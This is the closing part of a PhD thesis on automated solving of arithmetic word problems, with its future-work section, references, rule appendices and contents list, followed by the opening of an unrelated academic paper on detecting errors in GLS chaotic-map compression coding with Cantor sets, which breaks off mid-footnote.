quantities. 9.3.2 Unified Framework for Solvers Currently, the arithmetic solvers that we have developed handles word problems from the elementary school level. An interesting direction is to use the ideas developed in this thesis to create solvers for math word problems from higher grade (like algebra word problems), or for word problems from other related domains (like physics problems). A research question here is that, is it necessary to always build a new system from scratch when we move to a new domain, or can we build some components based on our work, which are independent of the domain. The answer is likely to be affirmative. An effective approach can be to augment our knowledge based system with the appropriate inference rules for the particular domain. This approach has a good potential to generalize the work done in this thesis, and develop strategies to create solvers for any domain. 9.3.3 Automated Math Tutoring System An interesting direction can be to develop automated math tutoring systems. Although there has been an increase in the number of available online courses, personalized feedback is usually lacking in these courses. However effective tutoring requires personalized interaction with students, and feedback on individual issues. An intelligent tutoring system can be the solution to this. Our work can be seen as a first step towards devel- oping intelligent math tutoring systems. Moving ahead, we have to model the interaction with students, and how the solver can generate step by step explanations for the solution. Another direction is to automatically detect the weakness of individual students, and generate practice problems for them specifically targeting those weakness. 104 References [Gun, 2015] (2015). 15 statistics that tell the story of gun violence this year. [Online; accessed 13-April-2017]. [Syr, 2017] (2017). Car bomb hits syrian refugee camp on jordan border. [Online; accessed 13-April-2017]. [Chi, 2017] (2017). Emanuel, allies spent at least $22.8 million to win. [Online; accessed 10-April-2017]. [Artzi and Zettlemoyer, 2013] Artzi, Y. and Zettlemoyer, L. (2013). UW SPF: The University of Washington Semantic Parsing Framework. [Bakman, 2007] Bakman, Y. (2007). Robust Understanding of Word Problems with Extraneous Information. ArXiv Mathematics e-prints. [Barwise and Cooper, 1981] Barwise, J. and Cooper, R. (1981). Generalized quantifiers and natural lan- guage. Linguistics and Philosophy, 4(2):159–219. [Barzilay and Lapata, 2006] Barzilay, R. and Lapata, M. (2006). Aggregation via Set Partitioning for Nat- ural Language Generation. In Proc. of HLT/NAACL. [Bengtson and Roth, 2008] Bengtson, E. and Roth, D. (2008). Understanding the value of features for coreference resolution. In Proc. of the Conference on Empirical Methods in Natural Language Processing (EMNLP). [Berant et al., 2014] Berant, J., Srikumar, V., Chen, P.-C., Linden, A. V., Harding, B., Huang, B., Clark, P., and Manning, C. D. (2014). Modeling biological processes for reading comprehension. In Proceedings of EMNLP. [Björkelund and Kuhn, 2014] Björkelund, A. and Kuhn, J. (2014). Learning structured perceptrons for coreference resolution with latent antecedents and non-local features. In Proceedings of the Annual Meeting of the Association for Computational Linguistics (ACL), pages 47–57, Baltimore, Maryland. Association for Computational Linguistics. [Bobrow, 1964] Bobrow, D. (1964). Natural language input for a computer problem solving system. Technical report, Cambridge, MA, USA. [Bundy et al., 1979] Bundy, A., Byrd, L., Luger, G., Mellish, C., Milne, R., and Palmer, M. (1979). MECHO: A program to solve mechanics problems. Department of Artificial Intelligence, University of Edinburgh. [Cai and Yates, 2013] Cai, Q. and Yates, A. (2013). Semantic Parsing Freebase: Towards Open-domain Semantic Parsing. In Proceedings of the Second Joint Conference on Lexical and Computational Semantics (*SEM). [Chang et al., 2015] Chang, K., Upadhyay, S., Chang, M., Srikumar, V., and Roth, D. (2015). Illinoissl: A JAVA library for structured prediction. CoRR, abs/1509.07179. 105 [Chang et al., 2007] Chang, M., Ratinov, L., and Roth, D. (2007). Guiding semi-supervision with constraint- driven learning. In Proc. of the Annual Meeting of the Association for Computational Linguistics (ACL), pages 280–287, Prague, Czech Republic. Association for Computational Linguistics. [Chang et al., 2010] Chang, M., Srikumar, V., Goldwasser, D., and Roth, D. (2010). Structured output learning with indirect supervision. In Proc. of the International Conference on Machine Learning (ICML). [Chang et al., 2012] Chang, M.-W., Ratinov, L., and Roth, D. (2012). Structured learning with constrained conditional models. Machine Learning, 88(3):399–431. [Charniak, 1968] Charniak, E. (1968). Carps, a program which solves calculus word problems. Technical report, Cambridge, MA, USA. [Chen and Manning, 2014] Chen, D. and Manning, C. D. (2014). A fast and accurate dependency parser using neural networks. In Empirical Methods in Natural Language Processing (EMNLP). [Clark, 2015] Clark, P. (2015). Elementary school science and math tests as a driver for ai: Take the aristo challenge! In AAAI. [Clarke et al., 2010] Clarke, J., Goldwasser, D., Chang, M., and Roth, D. (2010). Driving semantic parsing from the world’s response. In Proc. of the Conference on Computational Natural Language Learning (CoNLL). [Clarke and Lapata, 2006] Clarke, J. and Lapata, M. (2006). Constraint-based sentence compression: An integer programming approach. In Proceedings of the Annual Meeting of the Association for Computational Linguistics (ACL), pages 144–151, Sydney, Australia. ACL. [Collins, 2002] Collins, M. (2002). Discriminative training methods for hidden Markov models: Theory and experiments with perceptron algorithms. In Proceedings of the Conference on Empirical Methods for Natural Language Processing (EMNLP). [Cortes and Vapnik, 1995] Cortes, C. and Vapnik, V. (1995). Support-vector networks. Machine Learning, 20:273–297. [Dagan et al., 2006] Dagan, I., Glickman, O., and Magnini, B., editors (2006). The PASCAL Recognising Textual Entailment Challenge., volume 3944. Springer-Verlag, Berlin. [Dagan et al., 2013] Dagan, I., Roth, D., Sammons, M., and Zanzoto, F. M. (2013). Recognizing textual entailment: Models and applications. [de Kleer, 1977] de Kleer, J. (1977). Multiples representations of knowledge in a mechanics problem-solver. In Proceedings of the 5th International Joint Conference on Artificial Intelligence - Volume 1, IJCAI’77, pages 299–304. [de Marneffe et al., 2008] de Marneffe, M.-C., Rafferty, A. N., and Manning, C. D. (2008). Finding contra- dictions in text. In Proceedings of the Annual Meeting of the Association for Computational Linguistics (ACL), pages 1039–1047, Columbus, Ohio. Association for Computational Linguistics. [DeJong, 1993] DeJong, G. (1993). Investigating explanation-based learning. Kluwer international series in engineering and computer science. Kluwer Academic Publishers. [DeJong, 2014] DeJong, G. (2014). Explanation-based learning. In Gonzalez, T., Diaz-Herrera, J., and Tucker, A., editors, CRC computing handbook: Computer science and software engineering, pages 66.1– 66.26. CRC Press, Boca Raton. [Dellarosa, 1986] Dellarosa, D. (1986). A computer simulation of children’s arithmetic word-problem solving. Behavior Research Methods, Instruments, & Computers, 18(2):147–154. 106 [Diane J. Briars, 1984] Diane J. Briars, J. H. L. (1984). An integrated model of skill in solving elementary word problems. Cognition and Instruction, 1(3):245–296. [Fletcher, 1985] Fletcher, C. R. (1985). Understanding and solving arithmetic word problems: A computer simulation. Behavior Research Methods, Instruments, & Computers, 17(5):565–571. [Forbus, 1984] Forbus, K. (1984). Qualitative process theory. Artificial Intelligence, 24:85–168. [Freund and Schapire, 1998] Freund, Y. and Schapire, R. (1998). Large margin classification using the Perceptron algorithm. In Proceedings of the Annual ACM Workshop on Computational Learning Theory (COLT), pages 209–217. [Ganchev et al., 2010] Ganchev, K., Graça, J., Gillenwater, J., and Taskar, B. (2010). Posterior regulariza- tion for structured latent variable models. Journal of Machine Learning Research. [Gelb, 1971] Gelb, J. P. (1971). Experiments with a natural language problem-solving system. In Proceedings of the 2nd International Joint Conference on Artificial Intelligence, IJCAI’71, pages 455–462. [Goldberg and Elhadad, 2010] Goldberg, Y. and Elhadad, M. (2010). An efficient algorithm for easy-first non-directional dependency parsing. In Proceedings of the Annual Meeting of the North American Asso- ciation of Computational Linguistics (NAACL). [Goldwasser and Roth, 2011] Goldwasser, D. and Roth, D. (2011). Learning from natural instructions. In Proc. of the International Joint Conference on Artificial Intelligence (IJCAI). [Hosseini et al., 2014] Hosseini, M. J., Hajishirzi, H., Etzioni, O., and Kushman, N. (2014). Learning to solve arithmetic word problems with verb categorization. In Proceedings of the Conference on Empirical Methods for Natural Language Processing (EMNLP). [Joachims et al., 2009] Joachims, T., Finley, T., and Yu, C.-N. (2009). Cutting-plane training of structural svms. Machine Learning, 77(1):27–59. [Kai-Wei Chang and Roth, 2013] Kai-Wei Chang, R. S. and Roth, D. (2013). A constrained latent variable model for coreference resolution. In Proc. of the Conference on Empirical Methods in Natural Language Processing (EMNLP). [Koncel-Kedziorski et al., 2015] Koncel-Kedziorski, R., Hajishirzi, H., Sabharwal, A., Etzioni, O., and Ang, S. (2015). Parsing Algebraic Word Problems into Equations. TACL. [Koncel-Kedziorski et al., 2016] Koncel-Kedziorski, R., Roy, S., Amini, A., Kushman, N., and Hajishirzi, H. (2016). Mawps: A math word problem repository. In NAACL. [Kuehne, 2004a] Kuehne, S. (2004a). On the representation of physical quantities in natural language text. In Proceedings of Twenty-sixth Annual Meeting of the Cognitive Science Society. [Kuehne, 2004b] Kuehne, S. (2004b). Understanding natural language descriptions of physical phenomena. PhD thesis, Northwestern University, Evanston, Illinois. [Kushman et al., 2014] Kushman, N., Zettlemoyer, L., Barzilay, R., and Artzi, Y. (2014). Learning to automatically solve algebra word problems. In Proceedings of the Annual Meeting of the Association for Computational Linguistics (ACL), pages 271–281. [Kwiatkowski et al., 2013] Kwiatkowski, T., Choi, E., Artzi, Y., and Zettlemoyer, L. (2013). Scaling semantic parsers with on-the-fly ontology matching. In Proceedings of the 2013 Conference on Empirical Methods in Natural Language Processing, pages 1545–1556, Seattle, Washington, USA. Association for Computational Linguistics. 107 [Liang et al., 2011] Liang, P., Jordan, M. I., and Klein, D. (2011). Learning dependency-based compositional semantics. In Proceedings of the Annual Meeting of the Association for Computational Linguistics (ACL). [Maccartney and Manning, 2008] Maccartney, B. and Manning, C. D. (2008). Modeling semantic contain- ment and exclusion in natural language inference. In Proceedings of the 22nd International Conference on Computational Linguistics (Coling 2008), pages 521–528, Manchester, UK. Coling 2008 Organizing Committee. [Madaan et al., 2016] Madaan, A., Mittal, A., Mausam, Ramakrishnan, G., and Sarawagi, S. (2016). Nu- merical relation extraction with minimal supervision. In AAAI. [Marshall, 1995] Marshall, S. P. (1995). Schemas in problem solving. Cambridge Univ Press. [McDonald et al., 2005] McDonald, R., Pereira, F., Ribarov, K., and Hajic, J. (2005). Non-projective de- pendency parsing using spanning tree algorithms. In Proceedings of the Conference on Empirical Methods for Natural Language Processing (EMNLP), pages 523–530, Vancouver, British Columbia, Canada. Asso- ciation for Computational Linguistics. [Miller et al., 1990] Miller, G., Beckwith, R., Fellbaum, C., Gross, D., and Miller, K. (1990). Wordnet: An on-line lexical database. International Journal of Lexicography, 3(4):235–312. [Mitra and Baral, 2016] Mitra, A. and Baral, C. (2016). Learning to use formulas to solve simple arithmetic problems. In ACL. [Mukherjee and Garain, 2008] Mukherjee, A. and Garain, U. (2008). A review of methods for automatic understanding of natural language mathematical problems. Artificial Intelligence Review, 29(2):93–122. [Novak, 1976] Novak, G. S. (1976). Computer understanding of physics problems stated in natural language. PhD thesis, The University of Texas at Austin. [Oberem, 1987] Oberem, G. (1987). Albert: a physics problem solving monitor and coach. In Proceedings of the first inter- national conference on computer assisted learning (ICCAL87), ICCAL’87, pages 179–184. [Palmer et al., 2010] Palmer, M., Gildea, D., and Xue, N. (2010). Semantic Role Labeling, volume 3. Morgan & Claypool Publishers. [Pennington et al., 2014] Pennington, J., Socher, R., and Manning, C. D. (2014). Glove: Global vectors for word representation. In Proc. of EMNLP. [Punyakanok and Roth, 2001] Punyakanok, V. and Roth, D. (2001). The use of classifiers in sequential inference. In Proc. of the Conference on Neural Information Processing Systems (NIPS), pages 995–1001. MIT Press. [Punyakanok et al., 2005a] Punyakanok, V., Roth, D., and Yih, W. (2005a). The necessity of syntactic parsing for semantic role labeling. In Proc. of the International Joint Conference on Artificial Intelligence (IJCAI), pages 1117–1123. [Punyakanok et al., 2008] Punyakanok, V., Roth, D., and Yih, W. (2008). The importance of syntactic parsing and inference in semantic role labeling. Computational Linguistics, 34(2). [Punyakanok et al., 2005b] Punyakanok, V., Roth, D., Yih, W., and Zimak, D. (2005b). Learning and inference over constrained output. In Proc. of the International Joint Conference on Artificial Intelligence (IJCAI), pages 1124–1129. [Purdy, 1991] Purdy, W. (1991). A logic for natural language. Notre Dame Journal of Formal Logic, 32(3):409–425. 108 [Roth and Yih, 2004] Roth, D. and Yih, W. (2004). A linear programming formulation for global inference in natural language tasks. In Ng, H. T. and Riloff, E., editors, Proc. of the Conference on Computational Natural Language Learning (CoNLL), pages 1–8. Association for Computational Linguistics. [Roth and Yih, 2005] Roth, D. and Yih, W. (2005). Integer linear programming inference for conditional random fields. In Proc. of the International Conference on Machine Learning (ICML), pages 737–744. [Roth and Zelenko, 1998] Roth, D. and Zelenko, D. (1998). Part of speech tagging using a network of linear separators. In Coling-Acl, The 17th International Conference on Computational Linguistics, pages 1136– 1142. [Roy and Roth, 2015] Roy, S. and Roth, D. (2015). Solving general arithmetic word problems. In Proc. of the Conference on Empirical Methods in Natural Language Processing (EMNLP). [Roy and Roth, 2017] Roy, S. and Roth, D. (2017). Unit dependency graph and its application to arithmetic word problem solving. In Proc. of the Conference on Artificial Intelligence (AAAI). [Roy et al., 2015] Roy, S., Vieira, T., and Roth, D. (2015). Reasoning about quantities in natural language. Transactions of the Association for Computational Linguistics (TACL), 3. [Sammons et al., 2010] Sammons, M., Vydiswaran, V., and Roth, D. (2010). Ask not what textual entail- ment can do for you... In Proc. of the Annual Meeting of the Association for Computational Linguistics (ACL), Uppsala, Sweden. Association for Computational Linguistics. [Sarawagi and Cohen, 2004] Sarawagi, S. and Cohen, W. W. (2004). Semi-markov conditional random fields for information extraction. In The Conference on Advances in Neural Information Processing Systems (NIPS), pages 1185–1192. [Seo et al., 2014] Seo, M. J., Hajishirzi, H., Farhadi, A., and Etzioni, O. (2014). Diagram understanding in geometry questions. In AAAI. [Shalev-Shwartz et al., 2007] Shalev-Shwartz, S., Singer, Y., and Srebro, N. (2007). Pegasos: primal esti- mated sub-gradient solver for SVM. In Ghahramani, Z., editor, Proceedings of the International Conference on Machine Learning (ICML), pages 807–814. Omnipress. [Sutton and McCallum, 2007] Sutton, C. and McCallum, A. (2007). Piecewise pseudolikelihood for effi- cient training of conditional random fields. In Ghahramani, Z., editor, Proceedings of the International Conference on Machine Learning (ICML), pages 863–870. Omnipress. [Tsochantaridis et al., 2005] Tsochantaridis, I., Joachims, T., Hofmann, T., and Altun, Y. (2005). Large margin methods for structured and interdependent output variables. Journal of Machine Learning Re- search, 6:1453–1484. [Wong and Mooney, 2007] Wong, Y.-W. and Mooney, R. (2007). Learning synchronous grammars for se- mantic parsing with lambda calculus. In Proceedings of the Annual Meeting of the Association for Com- putational Linguistics (ACL), pages 960–967, Prague, Czech Republic. Association for Computational Linguistics. [Yu and Joachims, 2009] Yu, C. and Joachims, T. (2009). Learning structural svms with latent variables. In Proceedings of the International Conference on Machine Learning (ICML). 109 Appendix A Lexicon for Equation Parsing We construct a high precision list of rules, to parse sentences describing mathematical concepts, for example, “difference of”, “greater than”, etc for the equation parsing task described in Chapter 5. For each non-leaf node n of a projective equation tree, we define the following terms : 1. MidSpan(n) : The string from min(Span-End(lc(n)),Span-End(rc(n))) to max(Span-Start(lc(n)),Span-Start(rc(n))). 2. LeftSpan(n) : The string ending at min(Span-Start(lc(n)),Span-Start(rc(n))) and starting from the nearest trigger position on the left. 3. RightSpan(n) : The string starting at max(Span-End(lc(n)),Span-End(rc(n))) and ending at the nearest trigger position on the right. 4. LeftToken(n) : Defined only for leaves, indicates the span of text for the trigger of n. The rules in our lexicon are described using the above terms. They are as follows, ordered from low precedence to high precedence. 1. If LeftSpan(n) contains “sum of” and MidSpan(n) contains “and” or is the empty string, �(n) should be +. 2. If MidSpan(n) contains one of “added to”, “plus”, “more than” “taller than”, “greater than”, “larger than”, “faster than”, “longer than”, “increased”, �(n) should be +. 3. If MidSpan(n) contains one of “more than” “taller than”, “greater than”, “larger than”, “faster than”, “longer than”, and RightSpan(n) contains “by”, �(n) should be −, and Order(n) should be lr. 4. If LeftSpan(n) contains “difference of” and MidSpan(n) contains “and” or is the empty string, �(n) should be − and Order(n) should be lr. 110 5. If LeftSpan(n) contains one of “exceeds”, “minus”, “decreased”, �(n) should be −, and Order(n) should be lr. 6. If MidSpan(n) contains one of “subtracted” “shorter than”, “less than”, “slower than”, “smaller than”, �(n) should be −, and Order(n) should be rl. 7. If MidSpan(n) contains “multiplied by”, �(n) is ×. 8. If LeftSpan(n) contains “product of” and MidSpan(n) contains “and”, �(n) should be ×. 9. If LeftSpan(n) contains “ratio of”, �(n) should be ÷, and Order(n) should be lr. 10. If LeftToken(n) contains one of “thrice”, “triple”, “twice”, “double”, “half”, or if MidSpan(n) contains “times”, �(n) is ×. 11. If LeftToken(n) contains one of “thrice”, “triple”, “twice”, “double”, “half”, or if MidSpan(n) contains “times”, and MidSpan(n) contains “as”, and RightSpan(n) contains “as”, operation at �(n) is ÷, and Order(n) is rl. 111 Appendix B Declarative Rules for Arithmetic Word Problems Here, we list all the declarative rules for each knowledge type used in Chapter 8. • Transfer 1. [Verb1 ∈ HAVE] ∧ [Verb2 ∈ HAVE] ∧ [Coref(Subj1, Subj2)] ⇒ Subtraction 2. [Verb1 ∈ HAVE] ∧ [Verb2 ∈ (GET ∪ CONSTRUCT)] ∧ [Coref(Subj1, Subj2)] ⇒ Addition 3. [Verb1 ∈ HAVE] ∧ [Verb2 ∈ (GIVE ∪ DESTROY)] ∧ [Coref(Subj1, Subj2)] ⇒ Subtraction 4. [Verb1 ∈ (GET ∪ CONSTRUCT)] ∧ [Verb2 ∈ HAVE] ∧ [Coref(Subj1, Subj2)] ⇒ Subtraction 5. [Verb1 ∈ (GET ∪ CONSTRUCT)]∧[Verb2 ∈ (GET ∪ CONSTRUCT)]∧[Coref(Subj1, Subj2)] ⇒ Addition 6. [Verb1 ∈ (GET ∪ CONSTRUCT)] ∧ [Verb2 ∈ (GIVE ∪ DESTROY)] ∧ [Coref(Subj1, Subj2)] ⇒ Subtraction 7. [Verb1 ∈ (GIVE ∪ DESTROY)] ∧ [Verb2 ∈ HAVE] ∧ [Coref(Subj1, Subj2)] ⇒ Addition 8. [Verb1 ∈ (GIVE ∪ DESTROY)] ∧ [Verb2 ∈ (GET ∪ CONSTRUCT)] ∧ [Coref(Subj1, Subj2)] ⇒ Subtraction 9. [Verb1 ∈ (GIVE ∪ DESTROY)] ∧ [Verb2 ∈ (GIVE ∪ DESTROY)] ∧ [Coref(Subj1, Subj2)] ⇒ Addition We also have another rule for each rule above, which states that if Coref(Subj1, Obj2) or Coref(Subj2, Obj1) is true, and none of the verbs is CONSTRUCT or DESTROY, the final operation is changed from ad- dition to subtraction, or vice versa. To determine the order of subtraction, we always subtract the smaller number from the larger number. • Dimensional Analysis 1. [Coref(Unit1, Rate2)||Coref(Unit2, Rate1)] ⇒ Multiplication 112 2. [Coref(Unit1, Unit2)] ∧ [Rate2 6= null] ⇒ Division 3. [Coref(Unit1, Unit2)] ∧ [Rate1 6= null] ⇒ Division (Reverse order) • Explicit Math 1. [Coref(Subj1, IObj2)||Coref(Subj2, IObj1)] ∧ [Math1 ∈ ADD||Math2 ∈ ADD] ⇒ Addition 2. [Coref(Subj1, IObj2)||Coref(Subj2, IObj1)] ∧ [Math1 ∈ SUB||Math2 ∈ SUB] ⇒ Subtraction 3. [Coref(Subj1, Subj2)] ∧ [Math1 ∈ ADD||Math2 ∈ ADD] ⇒ Subtraction 4. [Coref(Subj1, Subj2)] ∧ [Math1 ∈ SUB||Math2 ∈ SUB] ⇒ Addition 5. [Coref(Subj1, Subj2)] ∧ [Math1 ∈ MUL] ⇒ Division (Reverse order) 6. [Coref(Subj1, Subj2)] ∧ [Math2 ∈ MUL] ⇒ Division 7. [Coref(Subj1, IObj2)||Coref(Subj2, IObj1)] ∧ [Math1 ∈ MUL||Math2 ∈ MUL] ⇒ Multiplication • Part-Whole Relationship 1. [Sibling(Number1, Number2)] ⇒ Addition 2. [Hyponym(Number1, Number2)] ⇒ Subtraction 3. [Hypernym(Number1, Number2)] ⇒ Subtraction 113 List of Tables List of Figures Chapter 1 Introduction Motivation Math Word Problems: An Abstraction for Quantitative Reasoning Challenges in Automated Quantitative Reasoning Variability of Natural Language Text Quantity Argument Detection Reasoning about Multiple Quantities Incorporating Domain Knowledge Contributions of the Thesis Overview of the Thesis Chapter 2 Background What is a Structure? Structured Prediction Inference in Structured Models Learning Structured Prediction Models Structural Support Vector Machines Discussion and Special Case Structured Prediction with Latent Variables Chapter 3 Early Work in Quantitative Reasoning Early Algebra and Arithmetic Solvers STUDENT Program Other Arithmetic Word Problem Solvers Solvers for other Domains Recent Advances in Statistical Solvers Chapter 4 Quantity Entailment Introduction Related Work Representing Quantities Extraction of Quantities Features Mapping Text Segments into QVR Extraction of Units Quantity Entailment Reasoning Framework Scope of QE Inference Experimental Study Datasets Quantity Segmentation Quantity Entailment Currency Range Search Qualitative Analysis Conclusion Chapter 5 Equation Parsing Introduction Related Work The Equation Parsing Task Equation Parse Representation Projectivity Predicting Equation Parse Predicting Quantity Trigger List Predicting Variable Trigger List Predicting Equation Tree Alternatives Experimental Results Dataset Equation Parsing Modules Equation Parsing Results Error Analysis Conclusion Chapter 6 Arithmetic Word Problems Introduction Related Work Expression Tree and Problem Decomposition Mapping Problems to Expression Trees Global Inference for Expression Trees Quantity Schema Relevance Classifier LCA Operation Classifier Experimental Results Datasets Relevance Classifier LCA Operation Classifier Global Inference Module Discussion Conclusion Chapter 7 Unit Dependency Graphs Introduction Unit Dependency Graph Learning to Predict UDGs Vertex Classifier Edge Classifier Constrained Inference Joint Inference With An Arithmetic Solver Monotonic Expression Tree Arithmetic Word Problem Solver Joint Inference Consistent Rate Unit Graphs Experiments Dataset Data Acquisition UDG Prediction Solving Arithmetic Word Problems Discussion Conclusion Chapter 8 Mapping to Declarative Knowledge Introduction Knowledge Representation Transfer Dimensional Analysis Explicit Math Part-Whole Relation Mapping of Word Problems to Declarative Knowledge Scoring Answer Derivations Learning Inference Model and Implementation Details Supervision Features Experiments Results on Existing Dataset New Dataset Creation Generalization from Biased Dataset Results on the New Dataset Analysis Related Work Conclusion Chapter 9 Conclusion and Future Work Summary Limitations Future Directions Commonsense Quantitative Reasoning Unified Framework for Solvers Automated Math Tutoring System References Appendix A Lexicon for Equation Parsing Appendix B Declarative Rules for Arithmetic Word Problems work_xvbrtnwmqbe55drlyo3jmsshuq ---- Submitted 11 October 2018 Accepted 21 December 2018 Published 14 January 2019 Corresponding author Nithin Nagaraj, nithin@nias.res.in, nithin.nagaraj@gmail.com Academic editor Arun Somani Additional Information and Declarations can be found on page 12 DOI 10.7717/peerj-cs.171 Copyright 2019 Nagaraj Distributed under Creative Commons CC-BY 4.0 OPEN ACCESS Using cantor sets for error detection Nithin Nagaraj Consciousness Studies Programme, National Institute of Advanced Studies, Bengaluru, India ABSTRACT Error detection is a fundamental need in most computer networks and communication systems in order to combat the effect of noise. Error detection techniques have also been incorporated with lossless data compression algorithms for transmission across communication networks. In this paper, we propose to incorporate a novel error detection scheme into a Shannon optimal lossless data compression algorithm known as Generalized Luröth Series (GLS) coding. GLS-coding is a generalization of the popular Arithmetic Coding which is an integral part of the JPEG2000 standard for still image compression. GLS-coding encodes the input message as a symbolic sequence on an appropriate 1D chaotic map Generalized Luröth Series (GLS) and the compressed file is obtained asthe initial valueby iterating backwards onthe map. However, in thepresence of noise, even small errors in the compressed file leads to catastrophic decoding errors owing to sensitive dependence on initial values, the hallmark of deterministic chaos. In this paper, we first show that repetition codes, the oldest and the most basic error correction and detection codes in literature, actually lie on a Cantor set with a fractal dimension of 1n, which is also the rate of the code. Inspired by this, we incorporate error detection capability to GLS-coding by ensuring that the compressed file (initial value on the chaotic map) lies on a Cantor set. Even a 1-bit error in the initial value will throw it outside the Cantor set, which can be detected while decoding. The rate of the code can be adjusted by the fractal dimension of the Cantor set, thereby controlling the error detection performance. Subjects Autonomous Systems, Computer Networks and Communications, Data Science, Mobile and Ubiquitous Computing, Software Engineering Keywords Error detection, Error control coding, Cantor sets, Shannon entropy, Arithmetic coding, Repetition codes, GLS-coding, Chaos, Lossless data compression INTRODUCTION Computers and communication systems invariably have to deal with the ill effects of noise, which can lead to errors in computation and information processing. In a landmark paper published in 1950, Richard Hamming addressed this problem by introducing mathematical techniques for error detection and correction (Hamming, 1950). Since then, coding theory has burgeoned to be a field of its own right, boasting of important research and developments in the art and science of error detection and correction (Lin & Costello, 1983). Error detection/correction techniques have therefore been a fundamental part of most computing systems and communication networks, typically applied on the input data after data compression (lossy/lossless) and encryption (Bose, 2008). Shannon’s separation theorem (Shannon, 1959) states that under certain assumptions, data compression (source coding) and error protection (channel coding) can be performed How to cite this article Nagaraj N. 2019. Using cantor sets for error detection. PeerJ Comput. Sci. 5:e171 http://doi.org/10.7717/peerj- cs.171 https://peerj.com mailto:nithin@nias.res.in mailto:nithin.nagaraj@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/10.7717/peerj-cs.171 http://creativecommons.org/licenses/by/4.0/ http://creativecommons.org/licenses/by/4.0/ http://doi.org/10.7717/peerj-cs.171 http://doi.org/10.7717/peerj-cs.171 1Progressive transmission refers to the successive approximation property of the bitstream where successive bits transmitted across the channel improve the fidelity of reconstruction at the decoder. separately and independently (sequentially) while still maintaining optimality. However, in several practical scenarios, these assumptions are not met and hence there is a need for joint source channel coding. In image/video browsing and web-based applications, it is highly desirable to have the property of progressive transmission1 (Said & Pearlman, 1996). However, even the slightest error can wreak havoc on a progressive bitstream. Hence, there is a need for incorporating error detection when decoding a compressed progressive bitstream. Lossless data compression refers to the removal of redundancy in the data—a pre- requisite step in most storage and communication systems before the application of an encryption algorithm and error control coding (for error detection/correction). Consider an i.i.d. binary message source S which emits ‘0’ with probability p (0 < p < 1). A binary message M of length N from such a source needs to be losslessly compressed. Shannon (Shannon, 1948) showed that such a message can at best be losslessly compressed to≥H(S)·N bits on an average, where H(S) is the Shannon’s entropy of the source. For an individual binary message M from such an i.i.d. source, we can compute H(·) as follows: H(M)=−plog2(p)−(1−p)log2(1−p) bits/symbol, (1) where p= Number of zeros in MN . There are several lossless compression algorithms in literature - Shannon-Fano coding, Huffman coding, Arithmetic coding, Lempel–Ziv coding and others (Cover & Thomas, 2006; Sayood, 2000). Among these, Arithmetic coding (Rissanen & Langdon, 1979) achieves the Shannon entropy limit for increasing message lengths. Arithmetic coding is used extensively in several practical applications owing to its speed, efficiency and progressive bitstream property. In fact, it is used in JPEG2000 (Taubman & Marcellin, 2002), the international standard for still image compression, replacing the popular Huffman coding which was used in the earlier JPEG (Wallace, 1992) standard. In 2009 (Nagaraj, Vaidya & Bhat, 2009), it was shown that Arithmetic coding is closely related to a 1D non-linear chaotic dynamical system known as Generalized Luröth Series (GLS).Specifically, itwas shownthat losslesscompression orencoding ofthe binarymessage M can be performed as follows. First, the message M is treated as a symbolic sequence on an appropriately chosen chaotic GLS. The initial value on the GLS corresponding to this symbolic sequence is computed by iterating backwards on the map. This initial value (written in binary) serves as the compressed file. For decompression, we start with this initial value (the compressed file) and iterate forwards on the (same) GLS, and record the symbolic sequence. This symbolic sequence is the decoded M. Such a simple lossless compression algorithm (known as GLS-coding) was proved to achieve Shannon’s entropy limit (Nagaraj, Vaidya & Bhat, 2009). Arithmetic coding turns out to be a special case of GLS-coding (Nagaraj, Vaidya & Bhat, 2009). Unfortunately, it turns out that GLS-coding (hence also arithmetic coding), having the progressive bitstream property, is very sensitive to errors. Even a single bit error in the compressed file can lead to catastrophic decoding errors. This has been well documented in the data compression literature (Boyd et al., 1997) and researchers have since been trying to enhance Arithmetic coding with error detection and correction properties (Anand, Ramchandran & Kozintsev, 2001; Pettijohn, Hoffman & Sayood, 2001). In this work, our Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 2/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.171 2One could alternately use the skew- binary map. There are eight possible modes of GLS in this case and all are equivalent in terms of compression ratio performance (Nagaraj, Vaidya & Bhat, 2009). aim is to incorporate error detection into GLS-coding by using Cantor set while not sacrificing much on the lossless compression ratio performance of GLS-coding. As we shall demonstrate, Cantor set has desirable properties that enable efficient error detection with GLS-decoding. The paper is organized as follows. In ‘GLS-Coding and Decoding’, we briefly describe GLS-coding of a binary message and its sensitivity to errors. In ‘Error Detection Using Cantor Set’, we explore Cantor set and describe its wonderful properties that enable error detection. Particularly, it is shown that Repetition codes belong to a Cantor set. Inspired by this, we incorporate error detection into GLS-coding using a Cantor set in ‘Incorporating Error Detection into GLS-Coding Using a Cantor Set’ and show simulation results of the proposed method. We conclude with open challenging problems in ‘Conclusions and Future Work’. GLS-CODING AND DECODING In this section, we shall briefly describe GLS-coding first proposed by Nagaraj, Vaidya & Bhat (2009). We are given a message M, of length L, from a binary i.i.d. source S. Our aim is to losslessly compress M. To this end, we first determine the probability of zeros in M, denoted by p. We then construct the GLS map Tp as follows: xn+1=Tp(xn)=   xn p , if 0≤xn <p, 1−xn 1−p , if p≤xn <1. The GLS-map, also known as the skew-tent map2, Tp, has two intervals: [0,p) and [p,1) which are tagged with the symbols ‘0’ and ‘1’ respectively. Starting with any initial value x0∈[0,1), the above map Tp can be applied iteratively to yield the real-valued time series {xi}. The symbolic sequence of this time series, denoted by {Si}, is simply obtained by: Si= { 0, if 0≤xi <p, 1, if p≤xi <1. Given the symbolic sequence {Si}, the inverse of Tp is given by: T−1p (yj)= { pyj, if Sj =0, 1−yj(1−p), if Sj =1, For GLS-coding, we begin by treating the given message M as a symbolic sequence{Si} i=L−1 i=0 of length L on the GLS Tp. The goal is to obtain the initial value x0 ∈[0,1) which when iterated forwards on Tp produces the symbolic sequence {Si} (= message M). To obtain x0, we begin by initializing START0=0.0 and END0=1.0. We then determine the inverse images of START0 and END0 by iterating backwards on Tp, by using T −1 p and starting with the last symbol SL−1. At the end of the first back-iteration, we obtain START1 and END1. We determine the inverse images of START1 and END1 (given SL−2) to determine the new interval [START2,END2). This is repeated L times to yield the final interval [STARTL−1,ENDL−1). All points within this final interval have the same symbolic sequence Nagaraj (2019), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.171 3/13 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.171 3The number of bits needed to store the compressed file x0 approaches the entropy H asymptotically as the length of the message approaches∞. 4Arithmetic code turns out to be using the 